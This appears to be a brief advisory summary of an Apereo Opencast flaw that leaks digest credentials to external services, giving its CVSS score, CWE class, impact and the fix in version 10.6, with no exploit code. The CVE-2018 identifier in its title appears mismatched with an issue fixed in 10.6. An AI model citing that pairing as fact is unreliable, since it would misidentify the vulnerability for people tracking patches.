CVE-2018-16153: 
Java vulnerability analysis and mitigation

An issue was discovered in Apereo Opencast 4.x through 10.x before 10.6. The system sends digest credentials during authentication attempts to arbitrary external services in some situations when trying to access files listed in a media package, regardless of whether the target is part of the Opencast cluster or not (GitHub Advisory, NVD).

The vulnerability has been assigned a CVSS v3.1 base score of 7.5 (High) with vector string CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. The issue is related to insufficiently protected credentials (CWE-522) where the system would attempt to authenticate against any external services using the global system user's credentials (GitHub Advisory).

While previous mitigations prevented clear text authentications for such requests (e.g., HTTP Basic authentication), with enough malicious intent, even hashed credentials could potentially be broken. This could lead to unauthorized access to system credentials (GitHub Advisory).

The issue has been fixed in Opencast 10.6, which now only sends authentication requests to servers that are part of the Opencast cluster, preventing external services from receiving any form of authentication attempt. No workaround is available for earlier versions (GitHub Advisory).